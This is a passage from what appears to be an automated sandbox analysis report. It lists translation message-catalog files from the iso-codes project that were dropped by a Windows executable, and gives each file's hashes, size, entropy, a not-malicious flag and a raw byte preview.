                                                                                                    SHA-512:6DA7A7718FCA3CC230173C9A99FDAE39E65017CEEFBD062466F96E4E8F837371322A3B3DFD5E789B8E7C0D28CB2C3722094170A1C40D48F82CF6779055B000E8
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........m.......G.......u..._...........Z...[...............H...2...[...........?.......6.......^...%...Y.......H......."...'...1...J...I...|...%.......".......\.......,...l...>...............+.......................A...-...]...o...+...............1...}........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 86 messages, Project-Id-Version: iso_4217 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6448
                                                                                                    Entropy (8bit):4.964126902655644
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:+pTI2t2tEkXX8xT8yPTZl4AviSmlGH7SEhSpJ8QwP3srwB34RgnBZNhfPpTisv+i:hqi8xd//vMkIJ/wdbJxBTxTn
                                                                                                    MD5:FE1BD1DAF874FC2CAF35BBD5D4F359BC
                                                                                                    SHA1:1052B64E21A0067D9FBFADA2CF1D6C6B38DECAAB
                                                                                                    SHA-256:E2861E771529D251F17659424951AFED54A101E447AB169A88B15366D4096A6F
                                                                                                    SHA-512:5D39D431FE12AB79504AC98B31EE42AA479B3D2AA758C2F39B5E29D8EA696C562C4BE09C320E5FE52D1F34E2F45E0A48BF020E5946BF9A371A57729E36DBD7C6
                                                                                                    Malicious:false
                                                                                                    Preview:........V...............|.......x.......y...............................................................................................,.......6.......E.......S.......a.......o.......................................................................................................*.......9.......H.......W.......\.......s...............................................................................................................#.......3.......8.......F.......M.......R.......W.......f.......j.......r.......................................................................................................&.......+.......3.......8.......?.......C.......S......._.......d.......j.......q.......|...............................\.......o...........1.......(.......4...(..."...]...(.......(.......................(...........G...1...f...".......+...............2.......%...I...A...o...%.......(.......7......./...8.......h...................%...............(.......(.......(...@..."...i...........M...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1626 messages, Project-Id-Version: iso_639-3 '\340\246\217\340\246\260\340\246\277\340\247\237\340\246\276\340\246\260\340\247\207'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96597
                                                                                                    Entropy (8bit):5.022174400863715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:GSxPk8KSlRns7ogO8wTQhsAzkOBMtORdMHophosGLhe9O:bKmRjgeMhsAVMetphtGLF
                                                                                                    MD5:4E0A9049356B4AC29C6C3959F23FD330
                                                                                                    SHA1:F8384CEB47C0C8D235DACD50A43FEA3DDD2588E3
                                                                                                    SHA-256:4DF08A70BE96606557A239FAFEBF52D70A826147C60B3744CE06364448A81917
                                                                                                    SHA-512:170E9939208E9DABD7F6C9B92BD6CB47818F360D950BAA81A4303C4CB18F558A5B5C3A0C8C85D777600D919AA10BBC8D8AE112E338B4687A7B829B0E18907FAA
                                                                                                    Malicious:false
                                                                                                    Preview:........Z........2.......e........................................................................................................&......./.......9.......I.......Y.......^.......c.......i.......m.......z..................................................................................................................................................".......(......./.......3.......=.......K.......S.......Y.......`.......g.......l.......s.......w.......}..........................................................................................................................-.......:.......J.......Z.......h.......o.......x.......~.................................................................................................................................................(.......4.......:.......=.......E.......L.......U.......^.......g.......o.......x.......}...........................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 65 messages, Project-Id-Version: iso_639-5 '\340\246\205\340\247\215\340\246\257\340\246\276\340\246\253\340\247\215\340\246\260\340\247\213-\340\246\217\340\246\266\340\247\200\340\247\237 \340\246\255\340\246\276\340\246\267\340\246\276'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5688
                                                                                                    Entropy (8bit):5.0110334511473384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:davRWydI8fJ0E0C+fICY6zbKPBAVIDeUOUHF8te:cWydb0E0JvWiUHWw
                                                                                                    MD5:B729383D5C811546AED7F2DD99B31880
                                                                                                    SHA1:B2ABCBA4AE95DEC6FFD1F56D7AD3B7320EA954DD
                                                                                                    SHA-256:18346502200F9DC2FE34DB350E372FB3343E5A4F5190EE0BEB9CF23BE1F5BC76
                                                                                                    SHA-512:5EB8306D0BE9F617EDF1826042FA2B03370A3AB05748FBBC4C4024C44D9B7DD42878669969269C9175F43E8CFC521D5D84BBC3F816EA3DB0EA0AA917D70CC29D
                                                                                                    Malicious:false
                                                                                                    Preview:........A.......$...Y...,.......................................................................................G.......\.......u...................................................................!...........9.......J...%...^...............................................................................1.......A.......S.......a.......v............................................................... .......1.......C.......T.......i.......{...............................................................................,.......;.......N.......^.......n...2...9...+...l...........4.......".......%......."...3...+...V...2.......1.......2.......7...........R...%...r...................................%......."...;...K...^...........).......\......."...N...(...q...2.......(.......................;...-...%...i...%......."......."...............2...........H.......h... ...............%.......G......./...4...N...d...".......%.......".......%......."...E..."...h..."..............."......./...........
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\340\246\206\340\246\246\340\246\262\340\246\276\340\246\256'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14811
                                                                                                    Entropy (8bit):5.056371814202998
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dySHxltU4WjV9qWxa5hW8077z1WeCErDk/0KQptraPTdpYxlz/Ys:wgg4WjVDxa5hW80DJY4raPa/Ys
                                                                                                    MD5:3A55B1EB296B01074964F2A8A1CD1616
                                                                                                    SHA1:E5BF9223B60C9211DDC4AEC60051161141D01C2B
                                                                                                    SHA-256:A2FC26BC844FB4F3031F84FDA3879FA0C8D9676A1D725C7B263B1B04D18C97A1
                                                                                                    SHA-512:4B4DCD0578D1611C524CB892EF060F356A46D1866A2AD7C66AD56DA1F3E7031357FF5B468E4A8A52A46CDB910F0F15800A4CD035E64365FFCC5B3E182D1A87A8
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 10 messages, Project-Id-Version: iso_3166-2 '\340\246\206\340\246\262 \340\246\253\340\247\201\340\246\234\340\246\276\340\246\257\340\246\274\340\246\260\340\246\276\340\246\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1161
                                                                                                    Entropy (8bit):5.488987547384928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:yc7oYFCoi2lYjCtBSt0U3OStw/NMXmGFkcqsWUJosesD88e8f:LLCCYjCf/UeStw75EWUe5gIw
                                                                                                    MD5:590F76D70BFF4F746FCE86A71C3A9996
                                                                                                    SHA1:C0E8A68E3C72426CE301674E43D3935A3C43FB30
                                                                                                    SHA-256:4174CE1D662420DCD08294D662073D930BFB795B5AEBCDD9AD5B1C70A0BE7CC2
                                                                                                    SHA-512:20E3530897BFB8CF8FA14FD0857996DC473C4770C86F4F7CEB2835638470BED149112B7F69818E527685246AD6A85936D6FC08DA33C71BAA2BF8AFD5BC285C60
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............................................................$.......7.......B.......I......._..."...@...2...c...........................@...................3...?...I........................................................Al Fujayrah.Andorra la Vella.Canillo.Dubayy.Encamp.Escaldes-Engordany.La Massana.Ordino.Sant Juli. de L.ria.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2020-08-03 12:41+0000.Last-Translator: Oymate <dhruboadittya96@gmail.com>.Language-Team: Bengali (Bangladesh) <https://hosted.weblate.org/projects/iso-codes/iso-3166-2/bn_BD/>.Language: bn_BD.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.2-dev.... .................... .. ...................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 29 messages, Project-Id-Version: iso_639-5 '\340\246\206\340\246\253\340\247\215\340\246\260\340\247\213-\340\246\217\340\246\266\340\247\200\340\246\257\340\246\274 \340\246\255\340\246\276\340\246\267\340\246\276\340\246\270\340\246\256\340\247\202\340\246\271'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2772
                                                                                                    Entropy (8bit):5.181581733023236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rEKk9jGQU2FvmYJ7K76pCUtStwoc9yZ/3dVsPhNeL/O:gzz7KKClwoZZ/3dV6NerO
                                                                                                    MD5:817C2372F58A11787FA2096B6F455762
                                                                                                    SHA1:7458308183EAF15A2FEDB4C47F1EA1D0CCE3B634
                                                                                                    SHA-256:C577DDE882B2CC5736749B6C0526B9FF498109106F3F3EED09C21DDCD8C3CC9F
                                                                                                    SHA-512:CFD2DB8730A2D9FD3E3463265FC5C82B4F3194E5150084A3706553048B3C73F47F20755C2E41F1006C50C08453AF8A7C120C6B8A86BC049F0BBD9F1AABD2C0F4
                                                                                                    Malicious:false
                                                                                                    Preview:....................)...................................................................................,.......A.......Z.......o...............................................................................$.......5.......F.......W.......j...........................8.......7...............+.......%...C..."...i...+.......".......1.......8...........F...>...u..."......."...........................:.......W.......w..."...........................................4...2...T...........,............................................................................................................................................................................Afro-Asiatic languages.Alacalufan languages.Algic languages.Algonquian languages.Apache languages.Arauan languages.Arawakan languages.Artificial languages.Athapascan languages.Atlantic-Congo languages.Australian languages.Austro-Asiatic languages.Baltic languages.Bamileke languages.Banda languages.Bantu languages.Batak languages.Berber langu
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 425 messages, Project-Id-Version: iso_3166-1 '\340\246\206\340\246\253\340\246\227\340\246\276\340\246\250\340\246\277\340\246\270\340\247\215\340\246\244\340\246\276\340\246\250'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36015
                                                                                                    Entropy (8bit):4.954295197816621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SNMJadAvPQfmsWP48WAI/6kCcOX9CdszX8ZrX6HxHarJXdRXdydpdQtCdr+bBKfe:k6yAvY3G/HErjrGjG28tM3PREfKOUIiM
                                                                                                    MD5:E1DA1C294A1A3A36EA3307F0CD47981B
                                                                                                    SHA1:2414809A78552E33D090D5847EE54B348E1463C6
                                                                                                    SHA-256:E4FC77F758FEF79AEAFD808A8D0817459D737D95D6863B5708776D778CB02CD6
                                                                                                    SHA-512:0892E4B9EEDC2FACA2576A98071F78CA01B619F593B72E0C18AFB92409B58F444E66068CBB0153E3224DD73FDAE918E6CABC13039F2CB960F5F5837600FD66F3
                                                                                                    Malicious:false
                                                                                                    Preview:................d...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......'$....../$......5$......?$......G$......R$......Z$......b$......m$......v$......~$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......#%......,%......:%......A%......`%......w%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......-&......6&......O&..,...k&.......&.......&..%....&.......&.......&.......&.......&.......&.......&.......'.......'.......'..%...''..,...M'.."...z'..*....'.......'.......'.......'.......'.......'.......(.......(.......(......+(......=(......E(......M(......V(......_(......{(..'....(..$....(.......(.......(.......)......*)......I)......g)......l)......t)......{).......).......).......).......).......).......).......).......).......).......).......*.......*......&*......0*......8*......C*......H*......R*......[*......b*......p*......w*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\340\246\254\340\247\215\340\246\260\340\246\277\340\246\237\340\246\277\340\246\266 \340\246\206\340\246\250\340\247\215\340\246\237\340\246\276\340\246\260\340\247\215\340\246\225\340\246\237\340\246\277\340\246\225 \340\246\205\340\246\236\340\247\215\340\246\232\340\246\262'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4091
                                                                                                    Entropy (8bit):5.164247865780025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDE19yBowUQXoQUXggt7X6G2Z2XhZ+5hC03XampXsYPdIPl:qDElwJXbUXxt7XDXh+Y03XdpXTPdIPl
                                                                                                    MD5:F9A2B5B554788F1EB82BB0E35A667383
                                                                                                    SHA1:91965153452939271D0D74B12A4CDAD7D34BD81B
                                                                                                    SHA-256:A48A6D190A44F1DE67BB32F48D36092CFBF725963483152E08C5A07572344E04
                                                                                                    SHA-512:CBF966D467E9EE219D644CF0B1EB0500E474DA568A831A5DCE7CDFB1A50EF20B1C9B5AF86280731AA24857E0AA92467AE6C70DEAA8AA3847BD1A816B8897C57E
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................G...c...u...........!...Z.......................2...............?.......6...:...^...q...Y.......H...*..."...s...1.......I.......%......."...8...\...[...,.......>...........$...+...:.......f...........A...y...].......+...........E...1............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 124 messages, Project-Id-Version: iso_15924 'Arabeg'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6545
                                                                                                    Entropy (8bit):4.935566122000586
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4nYQAonx1a6ESLUuuCzyKONK5qr0f4WgESaVJlxYsNVk0MzxNtLUPkjvT:wYQNnx1a6ExXknV4mSaFnVvkegb
                                                                                                    MD5:48CD9780450781BC862B61F2F802AE5E
                                                                                                    SHA1:6DA2236D818589B14A1F91494D6DDF009DC2A5AD
                                                                                                    SHA-256:147700E01F071FAB56F6CE95DFC33545A9D1F2F2C23F04F952AB34C4A5209B5B
                                                                                                    SHA-512:56F80BE6C9F2EB1D967A809099DEF6DF80B17FED5B6D78380CA0CF80A6FE099D542793012DCF64A7F32E37F895809B3AD0E7B2A11CA19AF6519E036F136EBBB3
                                                                                                    Malicious:false
                                                                                                    Preview:........|.......................x.......y.......................................................................................................................................................".......?.......\.......c.......~...........&...........................................................%.......:.......E.......L.......R.......[.......d.......~.......................................................................&.......=.......l.......u.......|...................................#...................................................$.......3.......9.......B.......K.......R.......Y.......c.......u...................................(.......................................#...%..."...I.......l.......w........................................................... ...........................................$......./.......>.......J.......R.......\.......i.......q.......x...........................................................................................................%...#.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 229 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10555
                                                                                                    Entropy (8bit):4.822454275313783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TCC/AWKo5hjuUk3S6nv2879Ti4EhzugoRuxODW2qUQZW+Ew:T5YUUSMt9W4EdugoRuxODW2QZrEw
                                                                                                    MD5:19660B85F115D0F2D03C763AAF5FEE54
                                                                                                    SHA1:9310B9BFFFA12062F738FD476940B53BA26D6883
                                                                                                    SHA-256:017C7787D25B268BAF4D070A293FA08DD81DE6D86EB553288276F70A9DFAA042
                                                                                                    SHA-512:CE48CB17AB8956B07EC52EBE2EF70BE772D7095B1E0613A8E406655B0373364A36C593424216A2DFF14DEA5BBA43C80169ACA3931057669A7457AA1396A27E1B
                                                                                                    Malicious:false
                                                                                                    Preview:................D...3...l.......8.......9.......E.......M.......U.......d.......l.......s.......|...............................................................................................................................................,.......5.......C.......J.......i...............................................................................................................................&.......1.......9.......>.......G.......N.......].......e.......n.......w...................................................................$...................!.......&...............5.......C.......T.......Z.......b.......j.......p.......z...................................................................................!...................................................#.......-.......2.......:.......F.......M.......S.......[.......a.......h.......o.......z.......................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 21 messages, Project-Id-Version: iso_3166-3 'Tachennad Antarktika eus Breizh-Veur'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2105
                                                                                                    Entropy (8bit):5.24124262568481
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aBxaac6YqahSGe4wMlkauOEfnq7BikHOWUoc0jNY5t0U12cwu1LXmjBoRKvmlZtY:WYaSSE0vzodjNYoUVwLNeGnafM0g
                                                                                                    MD5:764B31D2707EC0A846D19CB378037B54
                                                                                                    SHA1:490C911A146667B7635E28A0634EC5BBE03E8EBF
                                                                                                    SHA-256:343C040B708E4B8E8F5323F1BE2AB3DC57173EEE0430F0FD99F15FD0EBF83103
                                                                                                    SHA-512:3B2DDED28CF4207A70B76BF2DE76F6CBE9E0C09521F76EDB4449D96F6CAF0446AFC331C71D9FB67B9EF1CCB9577D47DE2FD18ACA6F40B1712D38DB9648314BD1
                                                                                                    Malicious:false
                                                                                                    Preview:........................l...................).......*...'.......R.../...o...........................)...................#.......8.......E...!...R.......t... .......)............... .......2...........>...$............... ...........@...2...[...................'.......0...................%.......=.......M.......].......k...+.......(...............$.......'............................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dronning Maud Land.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territories.German Democratic Republic.Netherlands Antilles.Neutral Zone.New Hebrides.Pacific Islands (trust territory).Panama Canal Zone.US Miscellaneous Pacific Islands.USSR, Union of Soviet Socialist Republics.Upper Volta, Republic o
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 99 messages, Project-Id-Version: iso_4217 'Afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4788
                                                                                                    Entropy (8bit):4.707143861978661
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:fR1C5nDDu9EWe8htqlXr8pSm94LtO1XlJTuoAhSKCP/P6uKmUIL1eWSh96dxK+k4:fRwVvge8hM+uIF3ZKgPdKmDxvEnLq
                                                                                                    MD5:11524274029787F59776D0CBEAF460B5
                                                                                                    SHA1:4CC18672057D250649CDCB2B3E9C216EB96D81FE
                                                                                                    SHA-256:DADA41F045B4B5C6CB2A2A12D6857E427712E0282DF14076526ED8D48ADDFF01
                                                                                                    SHA-512:5640C8059A3A7CA05F15A5BAC3BE9B3691148B06D91AA0EF54E3A7433336E0E9A70BDD2C06A6E23CDB74555BFEAC7B759F0F3F7F5F624843452B3D4051252D2F
                                                                                                    Malicious:false
                                                                                                    Preview:........c.......4.......L.......p.......q.......y.......................................................................................................-.......<.......F.......\.......n.......{....................................................................................................................... ...............;.......H.......T.......d.......t.......y...............................................................................................................................-.......?.......R.......[.......l.......t.......................................................................................................................(.......,.......<.......C.......S.......b.......n.......{...........................................................................................................*...........*.......1.......@.......R.......`.......r...............................................................................................................-.......:.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 797 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32879
                                                                                                    Entropy (8bit):4.778092378665384
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:ajm4lx9nsTOM2EF/XugkY7rAhThBW25hklW1E:aa0nsT53XANhB9hnE
                                                                                                    MD5:78D4C7A3627AEDC544CAF10D73A596B9
                                                                                                    SHA1:3996DB2056595636FCFF7C951E98507D4A676615
                                                                                                    SHA-256:2B824BD8576585861E039250713A505BDB083B7E8122ED09717E5E17E2FF24ED
                                                                                                    SHA-512:1E65B0D2AABEC5627C536F059D0FC78EBAB1C221EADB8C31EC2B394E033A61C1EE68CB8781BBFDB9C1AA48DF8DBAC5457CF0C7E455E67B62428CC7DED9D78652
                                                                                                    Malicious:false
                                                                                                    Preview:....................'....1.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......B.......C.......C.......C.......C......#C......(C......-C......3C......8C......@C......GC......OC......TC......]C......iC......xC.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......C.......D.......D.......D.......D.......D...... D......&D......+D......@D......GD......PD......ZD......bD......jD......pD......~D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......D.......E.......E.......E.......E.......E......$E......+E......1E......8E......>E......EE......RE......_E......eE......mE......sE.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......E.......F.......F.......F.......F...... F......%F......-F......6F......>F......EF......JF......RF......XF......]F......dF......iF......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 403 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22283
                                                                                                    Entropy (8bit):5.037719040354388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:U/5+7GsHFJZZSkFJx3DMSg8J8jo5wsOP4XJOAE+irN6f9PaL94nBcO:U/5+aUFJZgkLxTcMmsOP4XJOAEmyx4l
                                                                                                    MD5:D9128EF0BE6343F6ACFD815EBDABCD92
                                                                                                    SHA1:2B8DEF7F6EAA5C166B084A912AFFEECE7A8B306B
                                                                                                    SHA-256:8D7B2DE7F26CA6FF6A4A8DFB1C313F57CF23E1D98E9D50CB927D0A263FB64257
                                                                                                    SHA-512:A5246690D36662641C959A67E6E1FD0098896A61E0C295D8DFD3A78C27CA37867C192599A089FC56047DE12EF4C4A96AEFCD025EC756D350A05F6496990BCC8A
                                                                                                    Malicious:false
                                                                                                    Preview:........................L........!.......!.......!.......!.......!.......!.......!.......!......."......."......#"......:"......D"......W"......_"......e"......o"......w".......".......".......".......".......".......".......".......".......".......".. ....".......".......".. ....#......<#......S#......\#......j#......q#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......#$......)$......:$......R$......[$......t$..,....$.......$.......$..%....$.......$.......$.......%.......%.......%.......%......&%......5%..%...D%..,...j%.."....%..*....%.......%.......%.......%.......&......&&.......&......4&......@&......R&......Z&......b&......k&.......&..'....&..$....&.......&.......&.......'......9'......W'......\'......d'......k'......y'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(...... (......((......3(......8(......B(......K(......R(......`(......g(......m(..!....(.......(.......(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 69 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3326
                                                                                                    Entropy (8bit):4.729052841878372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:dPzP7nOrDNwTqRt72mbpx1hHla6/TaEm9mh1hrlaJ:VzP7WwTqRN2ixkeRxhgJ
                                                                                                    MD5:4AF40B202622E150934AC662BDC0FD74
                                                                                                    SHA1:6970E9AD93C7D612A3348D32FB82089D8F635DE8
                                                                                                    SHA-256:4AA0AC02EBBF25FA32CDD90A76EFE1E1144896F204843B4AC3B19C7E7DC16E51
                                                                                                    SHA-512:A2BA5835927F692DF8C8AC4CDF946614C079513A0A810BB10EE5AA4EB4A4A38E8EFBEFA4EAA8DA43FDA8ADD6592F47CDC70405FECFE7E08DBC303C118624EE12
                                                                                                    Malicious:false
                                                                                                    Preview:........E.......D...a...l....................................................... .......&.......-.......>.......J.......S.......\.......q.......z...............................................................................................................................................................#.......,.......3.......A.......O.......Z.......e.......n.......t...............................................................................................................!.......0.......=.......G...$...M.......r.......w...................................................|...........6.......>.......F.......N.......^.......g.......m.......t.......................................................................................................................................................%.......*.......3.......A.......J.......T.......`.......i.......r.......y.......................................................................................................................'.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Britanska Antarkti\304\215ka Teritorija'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2593
                                                                                                    Entropy (8bit):5.21063515258434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADNZVJ6fQvGqIfdvqNuoUiVbNRSpwclmoOdHCVXyFfinoqotl:qDr6fQyBoFnwdmUVXyIXU
                                                                                                    MD5:E55BDB1473E59B0F2182E8A7370EE39B
                                                                                                    SHA1:E8B3DCF307CECC617CCB870A3CAE0805E8067F05
                                                                                                    SHA-256:BE677EAFFFFB09F10FEE534B28EE5769345B97BE1C0F481FF635D8E601DBD18B
                                                                                                    SHA-512:49325003D28F521498A97DAEE8D9F3146DF34BC62A59212CE0D700424A8D22AAD628831C7A162B8B7F7E52FD9E361370B0107C42F0CAE5BFEE4277DA5471BD31
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c..........._.......!.......&...+...2...R...........8...............................................*...2.......].......}...........................................,...................".......5.......<.......L...1...h...........................1....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 52 messages, Project-Id-Version: iso_639-3 'Azerbejd\304\221anski'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2394
                                                                                                    Entropy (8bit):4.654539620068959
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ErMzBplQfM7TtuAz0W/sGFgRxzYMUNy2C6DrGInyF:iMdpWfqGBYMx2C63fnu
                                                                                                    MD5:1A0B9A12E1F51B94492CB88DE5DEA0EE
                                                                                                    SHA1:8EAB8CCFF0D62A2C87DA231F31111EB07FD30C45
                                                                                                    SHA-256:969DCB500BE2C72FE9FDA848F32E6DE1BF99221F23A467346E33CCC326DC5B4A
                                                                                                    SHA-512:CE209C54F5648931D6A6B1E3F20BA017A22E007C1513055F5F28D9B9C9F8642A2E797AF070D61203B0DDF3838B91596A2B0DBE0B4B9F1B89AB062A11C4D4329C
                                                                                                    Malicious:false
                                                                                                    Preview:........4...........G...\.......x.......y............................................................................................................................................................... .......'.......1.......;.......F.......L.......T.......].......d.......l.......t...................................................................................................................................................................W... .......x.......................................................................................................................................#.......*.......4.......>.......H.......S.......].......i.......o.......z.......................................................................................................................................................'.......2.......9.......E.......N.......T.......1...,...-...........2.......................$...*...........)...................&...........+...........................'...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5711
                                                                                                    Entropy (8bit):5.024477099815847
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5IFFlaRFMO89kjFbEylUyAWcBwG7YG/wLYpoikXLyCviLz:iIb0FbEKt2ZfoLz4
                                                                                                    MD5:BA3AF0F8274254AA34F2C8C71B07FEF9
                                                                                                    SHA1:3CDEB5B459C60B422EE357AD95E3153A9F4F2166
                                                                                                    SHA-256:CE69B465191851F87FEB059F9BCE45573C0135A2FDC1E4CE9A452B1EC266E70A
                                                                                                    SHA-512:4C22AE98B37838802E3009EDE7BFC827C71BB1D123EFBDFFB146AEF6062D39706EF0109F7D7999D456B439BE891B73AC19A404FE733BEB35425F4ECC9DBA1521
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................M...................%.......5.......B.......U.......e.......{.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):474
                                                                                                    Entropy (8bit):5.376342172855304
                                                                                                    Encrypted:false
